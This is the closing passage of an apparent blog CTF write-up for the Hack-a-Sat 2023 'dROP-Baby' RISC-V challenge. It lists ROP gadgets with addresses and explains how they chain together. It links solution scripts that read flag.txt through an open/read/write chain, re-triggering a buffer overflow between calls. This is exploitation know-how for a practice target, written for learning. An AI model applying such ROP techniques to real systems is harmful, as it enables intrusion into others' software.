</span></span><span style=display:flex><span>  <span style=color:#a6e22e>c.lwsp</span> <span style=color:#66d9ef>ra</span>, <span style=color:#ae81ff>0x2c</span>(<span style=color:#66d9ef>sp</span>) <span style=color:#75715e>;
</span></span></span><span style=display:flex><span><span style=color:#75715e></span>  <span style=color:#a6e22e>c.lwsp</span> <span style=color:#66d9ef>s0</span>, <span style=color:#ae81ff>0x28</span>(<span style=color:#66d9ef>sp</span>) <span style=color:#75715e>;
</span></span></span><span style=display:flex><span><span style=color:#75715e></span>  <span style=color:#a6e22e>c.lwsp</span> <span style=color:#66d9ef>s1</span>, <span style=color:#ae81ff>0x24</span>(<span style=color:#66d9ef>sp</span>) <span style=color:#75715e>;
</span></span></span><span style=display:flex><span><span style=color:#75715e></span>  <span style=color:#a6e22e>c.lwsp</span> <span style=color:#66d9ef>s2</span>, <span style=color:#ae81ff>0x20</span>(<span style=color:#66d9ef>sp</span>) <span style=color:#75715e>;
</span></span></span><span style=display:flex><span><span style=color:#75715e></span>  <span style=color:#a6e22e>c.lwsp</span> <span style=color:#66d9ef>s3</span>, <span style=color:#ae81ff>0x1c</span>(<span style=color:#66d9ef>sp</span>) <span style=color:#75715e>;
</span></span></span><span style=display:flex><span><span style=color:#75715e></span>  <span style=color:#a6e22e>c.lwsp</span> <span style=color:#66d9ef>s5</span>, <span style=color:#ae81ff>0x14</span>(<span style=color:#66d9ef>sp</span>) <span style=color:#75715e>;
</span></span></span><span style=display:flex><span><span style=color:#75715e></span>  <span style=color:#a6e22e>c.lwsp</span> <span style=color:#66d9ef>s6</span>, <span style=color:#ae81ff>0x10</span>(<span style=color:#66d9ef>sp</span>) <span style=color:#75715e>;
</span></span></span><span style=display:flex><span><span style=color:#75715e></span>  <span style=color:#a6e22e>c.lwsp</span> <span style=color:#66d9ef>s7</span>, <span style=color:#ae81ff>0xc</span>(<span style=color:#66d9ef>sp</span>)  <span style=color:#75715e>;
</span></span></span><span style=display:flex><span><span style=color:#75715e></span>  <span style=color:#a6e22e>c.lwsp</span> <span style=color:#66d9ef>s8</span>, <span style=color:#ae81ff>8</span>(<span style=color:#66d9ef>sp</span>)    <span style=color:#75715e>; 
</span></span></span><span style=display:flex><span><span style=color:#75715e></span>  <span style=color:#a6e22e>c.mv</span> <span style=color:#66d9ef>a0</span>, <span style=color:#66d9ef>s4</span>         <span style=color:#75715e>;
</span></span></span><span style=display:flex><span><span style=color:#75715e></span>  <span style=color:#a6e22e>c.lwsp</span> <span style=color:#66d9ef>s4</span>, <span style=color:#ae81ff>0x18</span>(<span style=color:#66d9ef>sp</span>) <span style=color:#75715e>;
</span></span></span><span style=display:flex><span><span style=color:#75715e></span>  <span style=color:#a6e22e>c.addi16sp</span> <span style=color:#66d9ef>sp</span>, <span style=color:#ae81ff>0x30</span> <span style=color:#75715e>;
</span></span></span><span style=display:flex><span><span style=color:#75715e></span>  <span style=color:#a6e22e>c.jr</span> <span style=color:#66d9ef>ra</span>
</span></span><span style=display:flex><span>
</span></span><span style=display:flex><span><span style=color:#75715e># Control a0, a1, a2 function arguments
</span></span></span><span style=display:flex><span><span style=color:#75715e></span><span style=color:#960050;background-color:#1e0010>0</span>x00026900:
</span></span><span style=display:flex><span>  <span style=color:#a6e22e>c.lwsp</span> <span style=color:#66d9ef>a2</span>, <span style=color:#ae81ff>0x10</span>(<span style=color:#66d9ef>sp</span>) <span style=color:#75715e>;
</span></span></span><span style=display:flex><span><span style=color:#75715e></span>  <span style=color:#a6e22e>c.lwsp</span> <span style=color:#66d9ef>a1</span>, <span style=color:#ae81ff>0x18</span>(<span style=color:#66d9ef>sp</span>) <span style=color:#75715e>;
</span></span></span><span style=display:flex><span><span style=color:#75715e></span>  <span style=color:#a6e22e>c.lwsp</span> <span style=color:#66d9ef>a0</span>, <span style=color:#ae81ff>0x14</span>(<span style=color:#66d9ef>sp</span>) <span style=color:#75715e>;
</span></span></span><span style=display:flex><span><span style=color:#75715e></span>  <span style=color:#a6e22e>c.mv</span> <span style=color:#66d9ef>a5</span>, <span style=color:#66d9ef>s8</span> <span style=color:#75715e>;
</span></span></span><span style=display:flex><span><span style=color:#75715e></span>  <span style=color:#a6e22e>c.li</span> <span style=color:#66d9ef>a6</span>, <span style=color:#ae81ff>0</span> <span style=color:#75715e>;
</span></span></span><span style=display:flex><span><span style=color:#75715e></span>  <span style=color:#a6e22e>c.li</span> <span style=color:#66d9ef>a4</span>, <span style=color:#ae81ff>0</span> <span style=color:#75715e>;
</span></span></span><span style=display:flex><span><span style=color:#75715e></span>  <span style=color:#a6e22e>c.mv</span> <span style=color:#66d9ef>a3</span>, <span style=color:#66d9ef>s6</span> <span style=color:#75715e>;
</span></span></span><span style=display:flex><span><span style=color:#75715e></span>  <span style=color:#a6e22e>c.jalr</span> <span style=color:#66d9ef>s0</span>
</span></span><span style=display:flex><span>
</span></span><span style=display:flex><span><span style=color:#75715e># Gadget that does not use `ra` to jump.
</span></span></span><span style=display:flex><span><span style=color:#75715e># Instead, it controls `ra`, so we can return from a function call back
</span></span></span><span style=display:flex><span><span style=color:#75715e># to our ROP chain.
</span></span></span><span style=display:flex><span><span style=color:#75715e></span><span style=color:#960050;background-color:#1e0010>0</span>x0001a410:
</span></span><span style=display:flex><span>  <span style=color:#a6e22e>c.lwsp</span> <span style=color:#66d9ef>ra</span>, <span style=color:#ae81ff>0x1c</span>(<span style=color:#66d9ef>sp</span>) <span style=color:#75715e>;
</span></span></span><span style=display:flex><span><span style=color:#75715e></span>  <span style=color:#a6e22e>c.addi16sp</span> <span style=color:#66d9ef>sp</span>, <span style=color:#ae81ff>0x20</span> <span style=color:#75715e>;
</span></span></span><span style=display:flex><span><span style=color:#75715e></span>  <span style=color:#a6e22e>c.jr</span> <span style=color:#66d9ef>a5</span>
</span></span></code></pre></div><p>With the <code>lwsp</code> instructions we can load arbitrary values into registers and with the <code>addi16sp</code> we can increase the stack pointer. The <code>jr</code> and <code>jalr</code> use a register to jump, whcih we we can control with <code>lwsp</code>, and thus we can link gadgets togeather.</p><p>Now for the ROP chain payload we have two solutions:</p><ol><li><a href=https://github.com/nikosChalk/ctf-writeups/blob/master/hack-a-sat-23/pwn/dROP-Baby/src/solution-cheesy.py target=_blank rel="noopener noreferrer">solution-cheesy.py</a> - Abuses the fact that the flag is still somewhere in the stack. It finds the address of the flag in the stack and then does <code>puts(flag)</code>.</li><li><a href=https://github.com/nikosChalk/ctf-writeups/blob/master/hack-a-sat-23/pwn/dROP-Baby/src/solution.py target=_blank rel="noopener noreferrer">solution.py</a> - More hardcore ROP solution. It performs the following function calls with a ROP chain:<div class=highlight><pre tabindex=0 style=color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4><code class=language-c data-lang=c><span style=display:flex><span>fd<span style=color:#f92672>=</span><span style=color:#a6e22e>open</span>(<span style=color:#e6db74>&#34;flag.txt&#34;</span>, O_RDONLY);
</span></span><span style=display:flex><span><span style=color:#a6e22e>read</span>(fd, buf, <span style=color:#ae81ff>0x100</span>);
</span></span><span style=display:flex><span><span style=color:#a6e22e>write</span>(<span style=color:#ae81ff>1</span>, buf, <span style=color:#ae81ff>0x100</span>); <span style=color:#75715e>//write to stdout
</span></span></span></code></pre></div>After each function call, we re-trigger the buffer overflow as the whole ROP chain does not fit into the 300 bytes that we can write.</li></ol><p>When we execute our ROP chain, we get the flag!</p></div></article><hr><p class=articleTagsContainer><span> </span><strong>Tags:</strong>
<a href=/tags/ctf>#ctf</a>
<a href=/tags/environment-setup>#environment setup</a>
<a href=/tags/hack-a-sat>#hack-a-sat</a>
<a href=/tags/pwn>#pwn</a>
<a href=/tags/risc-v>#RISC-V</a></p></main><footer><hr><p><small>2024 &copy; Nikolaos Chalkiadakis</small></p><p><small><a href=https://gitlab.com/gabmus/hugo-ficurinia>Ficurinia theme</a> for <a href=https://gohugo.io>Hugo</a> by <a href=https://gabmus.org>Gabriele Musco</a>. Licensed under <a href=https://www.gnu.org/licenses/agpl-3.0.html>GNU AGPLv3</a>.</small></p></footer></div></div></div></body></html>